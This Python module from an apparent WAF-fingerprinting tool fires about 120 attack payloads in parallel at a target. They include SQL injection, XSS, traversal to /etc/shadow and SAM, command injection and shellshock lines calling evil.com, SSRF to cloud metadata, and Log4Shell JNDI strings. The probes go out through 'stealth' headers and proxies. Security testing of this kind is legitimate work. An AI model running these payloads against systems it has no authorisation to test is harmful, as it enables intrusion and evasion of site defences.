import logging
import shutil
import socket
import subprocess
import sys
import threading
from typing import Optional
from urllib.parse import urlparse

import requests
from rich.table import Table

from .utils import console, log, now_utc, stealth_headers, get_proxy_dict, get_basic_auth

BLOCK_CODES = {403, 406, 429, 503}

# ─── WAF / Bot-protection signatures ─────────────────────────────────────────
# Covers DataDome and CrowdSec (primary targets) plus all major vendors.

WAF_SIGNATURES = {
    # ── Primary targets ──────────────────────────────────────────────────────
    "DataDome": {
        "headers":  ["x-datadome", "x-datadome-cid", "x-dd-b", "x-dd-s", "x-datadome-isbot"],
        "body_kw":  ["datadome", "dd_referrer", "datadome.co", "_dd_s", "ddcaptcha"],
        "server":   [],
        "cookies":  ["datadome"],
        "notes":    "JS challenge + device fingerprinting. Blocking mode returns 403 with JS page.",
    },
    "CrowdSec": {
        "headers":  ["x-crowdsec", "x-crowdsec-action", "crowdsec-remediation"],
        "body_kw":  ["crowdsec", "crowdsecurity", "crowdsec.net", "crowdsec_ban"],
        "server":   [],
        "cookies":  [],
        "notes":    "Community-sourced IP reputation. Captcha or ban depending on scenario.",
    },
    # ── Major commercial vendors ──────────────────────────────────────────────
    "Cloudflare": {
        "headers":  ["cf-ray", "cf-cache-status", "cf-mitigated", "cf-edge-cache"],
        "body_kw":  ["cloudflare", "ray id", "__cf_bm", "cf-browser-verification", "attention required"],
        "server":   ["cloudflare"],
        "cookies":  ["__cf_bm", "cf_clearance"],
        "notes":    "Broad WAF + bot management. cf-ray present on every response.",
    },
    "PerimeterX": {
        "headers":  ["x-px-block-score", "x-px-uuid", "x-px-vid"],
        "body_kw":  ["perimeterx", "_pxvid", "px-captcha", "pxchallenge", "px.gif"],
        "server":   [],
        "cookies":  ["_px", "_pxvid", "pxcts", "_pxhd"],
        "notes":    "Widely used in e-commerce (Shopify, Magento). Behaviour-based.",
    },
    "Akamai Bot Manager": {
        "headers":  ["x-check-cacheable", "akamai-origin-hop", "x-akamai-transformed",
                     "x-akamai-request-id", "akamai-edge-log-uuid"],
        "body_kw":  ["akamai", "reference #", "akamai ghost", "access denied by akamai"],
        "server":   [],
        "cookies":  ["ak_bmsc", "bm_sz", "bm_sv"],
        "notes":    "Enterprise CDN + WAF. bm_sz cookie indicates Bot Manager active.",
    },
    "AWS WAF": {
        "headers":  ["x-amzn-waf-action", "x-amzn-requestid", "x-amz-apigw-id"],
        "body_kw":  ["aws waf", "request blocked", "awswaf", "403 forbidden"],
        "server":   [],
        "cookies":  ["aws-waf-token"],
        "notes":    "Common on AWS-hosted shops. aws-waf-token cookie for CAPTCHA challenges.",
    },
    "Imperva / Incapsula": {
        "headers":  ["x-iinfo", "x-cdn", "incap-ses", "x-sinadf"],
        "body_kw":  ["imperva", "incapsula", "request unsuccessful", "incap_ses",
                     "powered by incapsula"],
        "server":   [],
        "cookies":  ["incap_ses", "visid_incap", "nlbi_"],
        "notes":    "Often seen on financial/retail. incap_ses cookie is a strong indicator.",
    },
    "F5 BIG-IP ASM": {
        "headers":  ["x-wa-info", "x-cnection"],
        "body_kw":  ["the requested url was rejected", "f5 networks", "support id",
                     "please consult with your administrator"],
        "server":   ["big-ip"],
        "cookies":  ["TS01", "ts01"],
        "notes":    "Enterprise on-premise WAF. 'Support ID' in block page is definitive.",
    },
    "ModSecurity": {
        "headers":  [],
        "body_kw":  ["mod_security", "modsecurity", "not acceptable",
                     "406 not acceptable", "this error was generated by mod_security"],
        "server":   ["apache", "nginx"],
        "cookies":  [],
        "notes":    "Open-source WAF, often on Apache/Nginx. No distinctive headers.",
    },
    "Sucuri": {
        "headers":  ["x-sucuri-id", "x-sucuri-cache"],
        "body_kw":  ["sucuri", "sucuri website firewall", "access denied | sucuri"],
        "server":   ["sucuri"],
        "cookies":  [],
        "notes":    "Popular with WordPress shops. x-sucuri-id on every response.",
    },
    "Radware AppWall": {
        "headers":  ["x-rdwr-pop", "x-sl-compstate"],
        "body_kw":  ["radware", "appwall", "the requested url was blocked by radware"],
        "server":   [],
        "cookies":  [],
        "notes":    "Enterprise MSSP WAF. Uncommon in e-commerce.",
    },
    "Reblaze": {
        "headers":  ["x-reblaze-protection", "rbzid"],
        "body_kw":  ["reblaze", "this request has been blocked by reblaze"],
        "server":   [],
        "cookies":  ["rbzid"],
        "notes":    "Cloud-native WAF. rbzid session cookie is definitive.",
    },
    "Barracuda WAF": {
        "headers":  ["x-barracuda-link", "x-barracuda-start-time"],
        "body_kw":  ["barracuda", "barracuda networks", "barracuda web application firewall"],
        "server":   [],
        "cookies":  ["barra_counter_session"],
        "notes":    "SMB-focused WAF appliance.",
    },
}

# ─── CDN signatures ───────────────────────────────────────────────────────────

CDN_SIGNATURES = {
    "Cloudflare":    ["cf-ray", "cf-cache-status"],
    "Akamai":        ["x-check-cacheable", "akamai-origin-hop", "x-akamai-transformed"],
    "Fastly":        ["x-fastly-request-id", "fastly-restarts", "x-served-by"],
    "AWS CloudFront": ["x-amz-cf-id", "x-amz-cf-pop"],
    "Azure CDN":     ["x-msedge-ref"],
    "Varnish":       ["x-varnish"],
    "Squid":         ["x-squid-error"],
    "Nginx":         [],   # detected via Server header only
}

# ─── WAF probe payload library ────────────────────────────────────────────────
# Organised by attack category. Each probe has:
#   category  : used for grouping + per-category detection rate reporting
#   name      : short label shown in logs / table
#   path      : URL path (appended to target base)
#   params    : query-string dict
#   headers   : extra/override headers for this probe
#
# Detection = response status in BLOCK_CODES (403, 406, 429, 503)
# ~120 probes total, run in parallel (20 workers).

WAF_PROBES = [

    # ── SQL Injection (20 variants) ───────────────────────────────────────────
    {"category": "SQL Injection",    "name": "SQLi classic OR",         "path": "/", "params": {"id": "1' OR '1'='1"},                      "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi UNION 3col",         "path": "/", "params": {"id": "1 UNION SELECT 1,2,3--"},             "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi comment --",         "path": "/", "params": {"q": "' OR 1=1--"},                          "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi comment #",          "path": "/", "params": {"q": "' OR 1=1#"},                           "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi stacked DROP",       "path": "/", "params": {"id": "1; DROP TABLE users--"},              "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi boolean true",       "path": "/", "params": {"id": "1 AND 1=1"},                          "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi boolean false",      "path": "/", "params": {"id": "1 AND 1=2"},                          "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi sleep MySQL",        "path": "/", "params": {"id": "1' AND SLEEP(5)--"},                  "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi sleep MSSQL",        "path": "/", "params": {"id": "1'; WAITFOR DELAY '0:0:5'--"},        "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi error extractvalue", "path": "/", "params": {"id": "' AND extractvalue(1,version())--"},  "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi UNION NULL",         "path": "/", "params": {"id": "' UNION SELECT NULL,NULL,NULL--"},    "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi hex encode",         "path": "/", "params": {"id": "1 OR 0x31=0x31"},                     "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi URL encoded",        "path": "/", "params": {"id": "1%27%20OR%20%271%27%3D%271"},         "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi INFORMATION_SCHEMA", "path": "/", "params": {"id": "1 UNION SELECT table_name FROM information_schema.tables--"}, "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi blind substring",    "path": "/", "params": {"id": "1 AND SUBSTRING(version(),1,1)='5'"}, "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi order by",           "path": "/", "params": {"id": "1 ORDER BY 10--"},                    "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi INTO OUTFILE",       "path": "/", "params": {"id": "1 INTO OUTFILE '/tmp/x'"},            "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi pg_sleep",           "path": "/", "params": {"id": "'; SELECT pg_sleep(5)--"},            "headers": {}},
    {"category": "SQL Injection",    "name": "SQLi in User-Agent",      "path": "/", "params": {},                                           "headers": {"User-Agent": "' OR '1'='1"}},
    {"category": "SQL Injection",    "name": "SQLi in Referer",         "path": "/", "params": {},                                           "headers": {"Referer": "' UNION SELECT 1--"}},

    # ── XSS (18 variants) ────────────────────────────────────────────────────
    {"category": "XSS",              "name": "XSS script tag",          "path": "/", "params": {"q": "<script>alert(1)</script>"},           "headers": {}},
    {"category": "XSS",              "name": "XSS img onerror",         "path": "/", "params": {"q": "<img src=x onerror=alert(1)>"},        "headers": {}},
    {"category": "XSS",              "name": "XSS svg onload",          "path": "/", "params": {"q": "<svg onload=alert(1)>"},               "headers": {}},
    {"category": "XSS",              "name": "XSS javascript: URI",     "path": "/", "params": {"q": "javascript:alert(1)"},                 "headers": {}},
    {"category": "XSS",              "name": "XSS event attr",          "path": "/", "params": {"q": "\" onmouseover=\"alert(1)"},           "headers": {}},
    {"category": "XSS",              "name": "XSS body tag",            "path": "/", "params": {"q": "<body onload=alert(1)>"},              "headers": {}},
    {"category": "XSS",              "name": "XSS iframe",              "path": "/", "params": {"q": "<iframe src=javascript:alert(1)>"},    "headers": {}},
    {"category": "XSS",              "name": "XSS URL encoded",         "path": "/", "params": {"q": "%3Cscript%3Ealert(1)%3C/script%3E"},   "headers": {}},
    {"category": "XSS",              "name": "XSS double encoded",      "path": "/", "params": {"q": "%253Cscript%253Ealert(1)%253C/script%253E"}, "headers": {}},
    {"category": "XSS",              "name": "XSS in User-Agent",       "path": "/", "params": {},                                           "headers": {"User-Agent": "<script>alert(1)</script>"}},
    {"category": "XSS",              "name": "XSS in Referer",          "path": "/", "params": {},                                           "headers": {"Referer": "https://evil.com/<script>alert(1)</script>"}},
    {"category": "XSS",              "name": "XSS in Cookie",           "path": "/", "params": {},                                           "headers": {"Cookie": "x=<script>alert(1)</script>"}},
    {"category": "XSS",              "name": "XSS case variation",      "path": "/", "params": {"q": "<ScRiPt>alert(1)</ScRiPt>"},           "headers": {}},
    {"category": "XSS",              "name": "XSS null byte",           "path": "/", "params": {"q": "<scr\x00ipt>alert(1)</script>"},       "headers": {}},
    {"category": "XSS",              "name": "XSS input tag",           "path": "/", "params": {"q": "<input onfocus=alert(1) autofocus>"}, "headers": {}},
    {"category": "XSS",              "name": "XSS details tag",         "path": "/", "params": {"q": "<details open ontoggle=alert(1)>"},    "headers": {}},
    {"category": "XSS",              "name": "XSS math tag",            "path": "/", "params": {"q": "<math><mtext></table></math><img src=x onerror=alert(1)>"}, "headers": {}},
    {"category": "XSS",              "name": "XSS template literal",    "path": "/", "params": {"q": "${alert(1)}"},                         "headers": {}},

    # ── Path Traversal (15 variants) ─────────────────────────────────────────
    {"category": "Path Traversal",   "name": "Traversal unix basic",    "path": "/../../../etc/passwd",                   "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal windows basic", "path": "/../../../windows/system32/drivers/etc/hosts", "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal URL encoded",   "path": "/%2e%2e%2f%2e%2e%2fetc%2fpasswd",       "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal double encoded","path": "/%252e%252e%252fetc%252fpasswd",          "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal null byte",     "path": "/../../../etc/passwd%00",                "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal 8 levels",      "path": "/../../../../../../../../etc/passwd",    "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal mixed slash",   "path": "/..%2f..%2f..%2fetc/passwd",             "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal in param",      "path": "/",    "params": {"file": "../../etc/passwd"},            "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal path param",    "path": "/",    "params": {"path": "../../../etc/shadow"},          "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal etc shadow",    "path": "/../../../etc/shadow",                   "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal proc self",     "path": "/../../../proc/self/environ",            "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal win SAM",       "path": "/../../../windows/system32/config/SAM", "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal backslash",     "path": "/..\\..\\..\\etc\\passwd",               "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal overlong UTF8", "path": "/%c0%ae%c0%ae/etc/passwd",              "params": {}, "headers": {}},
    {"category": "Path Traversal",   "name": "Traversal in X-Path hdr", "path": "/",    "params": {},                   "headers": {"X-File-Path": "../../../etc/passwd"}},

    # ── Command Injection (12 variants) ───────────────────────────────────────
    {"category": "Command Injection", "name": "CMDi semicolon ls",      "path": "/", "params": {"cmd": "; ls -la"},                         "headers": {}},
    {"category": "Command Injection", "name": "CMDi pipe whoami",       "path": "/", "params": {"cmd": "| whoami"},                         "headers": {}},
    {"category": "Command Injection", "name": "CMDi backtick id",       "path": "/", "params": {"q":  "`id`"},                              "headers": {}},
    {"category": "Command Injection", "name": "CMDi subshell",          "path": "/", "params": {"q":  "$(cat /etc/passwd)"},                "headers": {}},
    {"category": "Command Injection", "name": "CMDi && id",             "path": "/", "params": {"q":  "1 && id"},                          "headers": {}},
    {"category": "Command Injection", "name": "CMDi || id",             "path": "/", "params": {"q":  "1 || id"},                          "headers": {}},
    {"category": "Command Injection", "name": "CMDi newline",           "path": "/", "params": {"q":  "1\nid"},                            "headers": {}},
    {"category": "Command Injection", "name": "CMDi windows dir",       "path": "/", "params": {"cmd": "& dir"},                           "headers": {}},
    {"category": "Command Injection", "name": "CMDi curl exfil",        "path": "/", "params": {"q":  "; curl http://169.254.169.254/"},    "headers": {}},
    {"category": "Command Injection", "name": "CMDi in User-Agent",     "path": "/", "params": {},                                          "headers": {"User-Agent": "() { :; }; curl http://evil.com/"}},
    {"category": "Command Injection", "name": "CMDi shellshock",        "path": "/", "params": {},                                          "headers": {"User-Agent": "() { ignored; }; echo Content-Type: text/plain; echo; echo SHELLSHOCK"}},
    {"category": "Command Injection", "name": "CMDi in Referer",        "path": "/", "params": {},                                          "headers": {"Referer": "http://evil.com/; ls"}},

    # ── Scanner / Scraper User-Agents (20 variants) ───────────────────────────
    {"category": "Bot / Scanner UA", "name": "UA python-requests",      "path": "/", "params": {}, "headers": {"User-Agent": "python-requests/2.31.0"}},
    {"category": "Bot / Scanner UA", "name": "UA curl",                 "path": "/", "params": {}, "headers": {"User-Agent": "curl/7.88.1"}},
    {"category": "Bot / Scanner UA", "name": "UA wget",                 "path": "/", "params": {}, "headers": {"User-Agent": "Wget/1.21.3"}},
    {"category": "Bot / Scanner UA", "name": "UA Go http client",       "path": "/", "params": {}, "headers": {"User-Agent": "Go-http-client/1.1"}},
    {"category": "Bot / Scanner UA", "name": "UA Java",                 "path": "/", "params": {}, "headers": {"User-Agent": "Java/1.8.0_292"}},
    {"category": "Bot / Scanner UA", "name": "UA Scrapy",               "path": "/", "params": {}, "headers": {"User-Agent": "Scrapy/2.11.0 (+https://scrapy.org)"}},
    {"category": "Bot / Scanner UA", "name": "UA Nikto",                "path": "/", "params": {}, "headers": {"User-Agent": "Nikto/2.1.6"}},
    {"category": "Bot / Scanner UA", "name": "UA SQLMap",               "path": "/", "params": {}, "headers": {"User-Agent": "sqlmap/1.7 (https://sqlmap.org)"}},
    {"category": "Bot / Scanner UA", "name": "UA Nmap NSE",             "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; Nmap Scripting Engine)"}},
    {"category": "Bot / Scanner UA", "name": "UA Acunetix",             "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; acunetix-scanning)"}},
    {"category": "Bot / Scanner UA", "name": "UA Burp Suite",           "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; BurpSuite)"}},
    {"category": "Bot / Scanner UA", "name": "UA Masscan",              "path": "/", "params": {}, "headers": {"User-Agent": "masscan/1.3"}},
    {"category": "Bot / Scanner UA", "name": "UA Nuclei",               "path": "/", "params": {}, "headers": {"User-Agent": "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"}},
    {"category": "Bot / Scanner UA", "name": "UA ZAP",                  "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; OWASP ZAP 2.14.0)"}},
    {"category": "Bot / Scanner UA", "name": "UA OpenVAS",              "path": "/", "params": {}, "headers": {"User-Agent": "OpenVAS/9.0"}},
    {"category": "Bot / Scanner UA", "name": "UA empty",                "path": "/", "params": {}, "headers": {"User-Agent": ""}},
    {"category": "Bot / Scanner UA", "name": "UA whitespace only",      "path": "/", "params": {}, "headers": {"User-Agent": "   "}},
    {"category": "Bot / Scanner UA", "name": "UA HeadlessChrome",       "path": "/", "params": {}, "headers": {"User-Agent": "HeadlessChrome/124.0.0.0"}},
    {"category": "Bot / Scanner UA", "name": "UA PhantomJS",            "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"}},
    {"category": "Bot / Scanner UA", "name": "UA Selenium",             "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/124.0.0.0 Safari/537.36; Selenium/4.0.0"}},

    # ── Header / IP Spoofing (12 variants) ────────────────────────────────────
    {"category": "Header Attacks",   "name": "XFF localhost",           "path": "/", "params": {}, "headers": {"X-Forwarded-For": "127.0.0.1"}},
    {"category": "Header Attacks",   "name": "XFF internal 10.x",      "path": "/", "params": {}, "headers": {"X-Forwarded-For": "10.0.0.1"}},
    {"category": "Header Attacks",   "name": "XFF chain spoof",         "path": "/", "params": {}, "headers": {"X-Forwarded-For": "127.0.0.1, 192.168.1.1"}},
    {"category": "Header Attacks",   "name": "X-Real-IP spoof",         "path": "/", "params": {}, "headers": {"X-Real-IP": "127.0.0.1"}},
    {"category": "Header Attacks",   "name": "X-Original-URL bypass",   "path": "/", "params": {}, "headers": {"X-Original-URL": "/admin"}},
    {"category": "Header Attacks",   "name": "X-Rewrite-URL bypass",    "path": "/", "params": {}, "headers": {"X-Rewrite-URL": "/admin"}},
    {"category": "Header Attacks",   "name": "X-Custom-IP-Auth",        "path": "/", "params": {}, "headers": {"X-Custom-IP-Authorization": "127.0.0.1"}},
    {"category": "Header Attacks",   "name": "X-Forwarded-Host",        "path": "/", "params": {}, "headers": {"X-Forwarded-Host": "evil.com"}},
    {"category": "Header Attacks",   "name": "Host header injection",   "path": "/", "params": {}, "headers": {"Host": "evil.com"}},
    {"category": "Header Attacks",   "name": "X-HTTP-Method override",  "path": "/", "params": {}, "headers": {"X-HTTP-Method-Override": "DELETE"}},
    {"category": "Header Attacks",   "name": "Content-Type confusion",  "path": "/", "params": {}, "headers": {"Content-Type": "application/x-www-form-urlencoded; charset=ibm037"}},
    {"category": "Header Attacks",   "name": "Transfer-Encoding att",   "path": "/", "params": {}, "headers": {"Transfer-Encoding": "chunked, identity"}},

    # ── SSRF (8 variants) ────────────────────────────────────────────────────
    {"category": "SSRF",             "name": "SSRF localhost param",    "path": "/", "params": {"url": "http://127.0.0.1/"},                 "headers": {}},
    {"category": "SSRF",             "name": "SSRF AWS metadata",       "path": "/", "params": {"url": "http://169.254.169.254/latest/meta-data/"}, "headers": {}},
    {"category": "SSRF",             "name": "SSRF file proto",         "path": "/", "params": {"url": "file:///etc/passwd"},               "headers": {}},
    {"category": "SSRF",             "name": "SSRF internal 192.168",   "path": "/", "params": {"redirect": "http://192.168.1.1/admin"},    "headers": {}},
    {"category": "SSRF",             "name": "SSRF GCP metadata",       "path": "/", "params": {"url": "http://metadata.google.internal/"}, "headers": {}},
    {"category": "SSRF",             "name": "SSRF via Referer",        "path": "/", "params": {},                                           "headers": {"Referer": "http://169.254.169.254/"}},
    {"category": "SSRF",             "name": "SSRF 0.0.0.0",            "path": "/", "params": {"url": "http://0.0.0.0/admin"},             "headers": {}},
    {"category": "SSRF",             "name": "SSRF decimal IP",         "path": "/", "params": {"url": "http://2130706433/"},               "headers": {}},

    # ── Log4Shell / JNDI (6 variants) ────────────────────────────────────────
    {"category": "Log4Shell",        "name": "Log4j JNDI ldap UA",      "path": "/", "params": {}, "headers": {"User-Agent": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell",        "name": "Log4j JNDI rmi UA",       "path": "/", "params": {}, "headers": {"User-Agent": "${jndi:rmi://evil.com/a}"}},
    {"category": "Log4Shell",        "name": "Log4j JNDI in param",     "path": "/", "params": {"q": "${jndi:ldap://evil.com/a}"},          "headers": {}},
    {"category": "Log4Shell",        "name": "Log4j nested evasion",    "path": "/", "params": {}, "headers": {"User-Agent": "${${lower:j}ndi:${lower:l}dap://evil.com/a}"}},
    {"category": "Log4Shell",        "name": "Log4j in X-Api-Version",  "path": "/", "params": {}, "headers": {"X-Api-Version": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell",        "name": "Log4j URL encoded",        "path": "/", "params": {}, "headers": {"User-Agent": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D"}},

]

_PROBE_WORKERS = 20  # parallel threads for probe requests


# ─── Detection helpers ────────────────────────────────────────────────────────

def _detect_waf(responses: list[dict]) -> tuple[str, str]:
    all_headers: dict[str, str] = {}
    all_bodies: str = ""
    all_cookies: str = ""

    for r in responses:
        all_headers.update({k.lower(): v.lower() for k, v in r.get("headers", {}).items()})
        all_bodies += r.get("body", "").lower()
        # Extract Set-Cookie values for cookie-based detection
        for k, v in r.get("headers", {}).items():
            if k.lower() in ("set-cookie", "cookie"):
                all_cookies += v.lower() + " "

    for vendor, sigs in WAF_SIGNATURES.items():
        for h in sigs["headers"]:
            if h.lower() in all_headers:
                return vendor, f"header:{h}"
        for kw in sigs["body_kw"]:
            if kw in all_bodies:
                return vendor, f"body:{kw}"
        server_val = all_headers.get("server", "")
        for s in sigs["server"]:
            if s in server_val:
                return vendor, f"server:{s}"
        for ck in sigs.get("cookies", []):
            if ck.lower() in all_cookies:
                return vendor, f"cookie:{ck}"

    blocked = any(r.get("status") in BLOCK_CODES for r in responses)
    if blocked:
        return "Unknown WAF", "blocked-probe"
    return "None detected", ""


def _detect_cdn(headers: dict) -> str:
    lower = {k.lower(): v for k, v in headers.items()}
    server = lower.get("server", "")
    if "nginx" in server and "cloudflare" not in server:
        pass  # Nginx alone is not a CDN
    for cdn, sig_headers in CDN_SIGNATURES.items():
        for sh in sig_headers:
            if sh.lower() in lower:
                return cdn
    return "None detected"


def _detect_blocking_mode(responses: list[dict]) -> str:
    for r in responses:
        if r.get("status") in BLOCK_CODES:
            return "ACTIVE"
    return "PASSIVE (detection-only)"


def _run_wafw00f(target_url: str, timeout: int = 45,
                 logger: Optional[logging.Logger] = None) -> dict:
    """
    Run wafw00f for authoritative WAF identification.
    Auto-installs via pip if not found.
    """
    import re as _re
    import subprocess as _sub
    import sys as _sys

    result: dict = {"waf_names": [], "detected": False, "raw": "", "error": None}

    wafw00f_path = shutil.which("wafw00f")
    if not wafw00f_path:
        log("[wafw00f] not found — installing via pip...", "info", logger)
        _sub.run(
            [_sys.executable, "-m", "pip", "install", "wafw00f", "--quiet"],
            capture_output=True, text=True, timeout=90,
        )
        wafw00f_path = shutil.which("wafw00f")

    if not wafw00f_path:
        result["error"] = "wafw00f install failed"
        return result

    try:
        proc = _sub.run(
            [wafw00f_path, target_url, "-a"],
            capture_output=True, text=True, timeout=timeout,
        )
        output = (proc.stdout or "") + (proc.stderr or "")
        result["raw"] = output[:1500]

        for line in output.splitlines():
            m = _re.search(
                r"is behind ([^(\n]+?)(?:\s*\([^)]+\))?\s+WAF",
                line, _re.IGNORECASE,
            )
            if m:
                waf_name = m.group(1).strip()
                if waf_name and waf_name not in result["waf_names"]:
                    result["waf_names"].append(waf_name)
                    result["detected"] = True

        if "no waf detected" in output.lower():
            result["detected"] = False
            result["waf_names"] = []

    except subprocess.TimeoutExpired:
        result["error"] = f"timed out ({timeout}s)"
    except Exception as e:
        result["error"] = str(e)

    return result


# ─── Main entry point ─────────────────────────────────────────────────────────

def run(target_url: str, timeout: int = 10, logger: Optional[logging.Logger] = None) -> dict:
    result: dict = {
        "target_alive": False,
        "waf_detected": "Unknown",
        "waf_match_reason": "",
        "waf_notes": "",
        "blocking_mode": "Unknown",
        "cdn_detected": "Unknown",
        "tech_stack": [],
        "rate_limit_headers": {},
        "robots_txt": False,
        "sitemap_xml": False,
        "https_enforced": target_url.startswith("https://"),
        "hsts": False,
        "probe_results": [],
    }

    parsed = urlparse(target_url)
    hostname = parsed.hostname or ""
    proxies = get_proxy_dict()

    log(f"[PREFLIGHT] Resolving DNS: {hostname}", "info", logger)
    try:
        socket.getaddrinfo(hostname, None)
    except socket.gaierror as e:
        log(f"[PREFLIGHT] DNS resolution failed: {e}", "error", logger)
        return result

    log(f"[PREFLIGHT] Checking target alive: {target_url}", "info", logger)
    try:
        r = requests.head(
            target_url, timeout=timeout, allow_redirects=True,
            headers=stealth_headers(), proxies=proxies,
        )
        result["target_alive"] = True
        base_headers = dict(r.headers)
    except Exception as e:
        log(f"[PREFLIGHT] Target unreachable: {e}", "error", logger)
        return result

    result["cdn_detected"] = _detect_cdn(base_headers)

    server  = base_headers.get("Server", base_headers.get("server", ""))
    powered = base_headers.get("X-Powered-By", base_headers.get("x-powered-by", ""))
    gen     = base_headers.get("X-Generator", base_headers.get("x-generator", ""))
    for val in (server, powered, gen):
        if val and val not in result["tech_stack"]:
            result["tech_stack"].append(val)

    lower_keys = {k.lower() for k in base_headers}
    if "strict-transport-security" in lower_keys:
        result["hsts"] = True
    for rh in ("X-RateLimit-Limit", "Retry-After", "RateLimit-Limit", "RateLimit-Reset"):
        if rh.lower() in lower_keys:
            result["rate_limit_headers"][rh] = base_headers.get(rh, "")

    for path_check, key in (("/robots.txt", "robots_txt"), ("/sitemap.xml", "sitemap_xml")):
        try:
            cr = requests.get(
                target_url.rstrip("/") + path_check, timeout=timeout,
                headers=stealth_headers(), allow_redirects=True, proxies=proxies,
            )
            result[key] = cr.status_code == 200
        except Exception:
            pass

    # ── wafw00f dedicated fingerprinting ─────────────────────────────────────
    log("[wafw00f] Running dedicated WAF fingerprinter...", "info", logger)
    wafw00f_data = _run_wafw00f(target_url, timeout=min(timeout + 30, 60), logger=logger)
    result["wafw00f"] = wafw00f_data
    if wafw00f_data.get("detected"):
        names = ", ".join(wafw00f_data["waf_names"])
        log(f"  [wafw00f] Detected: {names}", "success", logger)
        console.print(f"  [bold green][wafw00f][/bold green] Detected: [cyan]{names}[/cyan]")
    elif wafw00f_data.get("error"):
        log(f"  [wafw00f] {wafw00f_data['error']}", "warning", logger)
    else:
        console.print("  [dim][wafw00f] No WAF identified by dedicated fingerprinter[/dim]")
    console.print()

    total = len(WAF_PROBES)
    log(f"[PREFLIGHT] Running {total} WAF probe requests ({_PROBE_WORKERS} parallel)...", "info", logger)
    console.print(f"  Firing [bold]{total}[/bold] probes across "
                  f"[bold]{len(set(p['category'] for p in WAF_PROBES))}[/bold] attack categories...\n")

    probe_results: list[dict] = []
    lock = threading.Lock()
    sem  = threading.Semaphore(_PROBE_WORKERS)
    auth = get_basic_auth()

    def _fire(probe: dict) -> None:
        url  = target_url.rstrip("/") + probe["path"]
        hdrs = stealth_headers()
        hdrs.update(probe["headers"])
        with sem:
            try:
                pr = requests.get(
                    url, headers=hdrs, params=probe.get("params", {}),
                    timeout=timeout, allow_redirects=False,
                    proxies=proxies, auth=auth, verify=False,
                )
                entry = {
                    "category":     probe["category"],
                    "probe_name":   probe["name"],
                    "url":          url,
                    "status":       pr.status_code,
                    "blocked":      pr.status_code in BLOCK_CODES,
                    "headers":      dict(pr.headers),
                    "body_snippet": pr.text[:300] if pr.text else "",
                    "error":        None,
                    "timestamp":    now_utc(),
                }
            except Exception as e:
                entry = {
                    "category":     probe["category"],
                    "probe_name":   probe["name"],
                    "url":          url,
                    "status":       0,
                    "blocked":      False,
                    "headers":      {},
                    "body_snippet": "",
                    "error":        str(e),
                    "timestamp":    now_utc(),
                }
        with lock:
            probe_results.append(entry)

    threads = [threading.Thread(target=_fire, args=(p,), daemon=True) for p in WAF_PROBES]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    result["probe_results"] = probe_results

    # ── Per-category detection rates ──────────────────────────────────────────
    from collections import defaultdict
    by_cat: dict[str, list[dict]] = defaultdict(list)
    for entry in probe_results:
        by_cat[entry["category"]].append(entry)

    category_stats: list[dict] = []
    for cat, entries in by_cat.items():
        total_c   = len(entries)
        blocked_c = sum(1 for e in entries if e["blocked"])
        rate      = round(blocked_c / total_c * 100) if total_c else 0
        category_stats.append({
            "category":       cat,
            "total":          total_c,
            "blocked":        blocked_c,
            "detection_rate": rate,
        })
        log(f"  [{cat}] {blocked_c}/{total_c} blocked ({rate}%)", "info", logger)

    result["category_stats"] = category_stats

    waf, waf_reason = _detect_waf(probe_results)
    result["waf_detected"]     = waf
    result["waf_match_reason"] = waf_reason
    result["waf_notes"]        = WAF_SIGNATURES.get(waf, {}).get("notes", "")
    result["blocking_mode"]    = _detect_blocking_mode(probe_results)

    _print_preflight_summary(result)
    return result


def _print_preflight_summary(r: dict) -> None:
    # ── Fingerprint table ─────────────────────────────────────────────────────
    table = Table(
        title="Pre-Flight Security Fingerprint",
        show_header=True, header_style="bold cyan",
    )
    table.add_column("Property",  style="bold white", width=28)
    table.add_column("Value",     style="white")
    table.add_column("Notes",     style="dim",         width=40)

    alive_str = "[bold green]YES[/bold green]" if r["target_alive"] else "[bold red]NO[/bold red]"
    table.add_row("Target Alive", alive_str, "")

    waf   = r["waf_detected"]
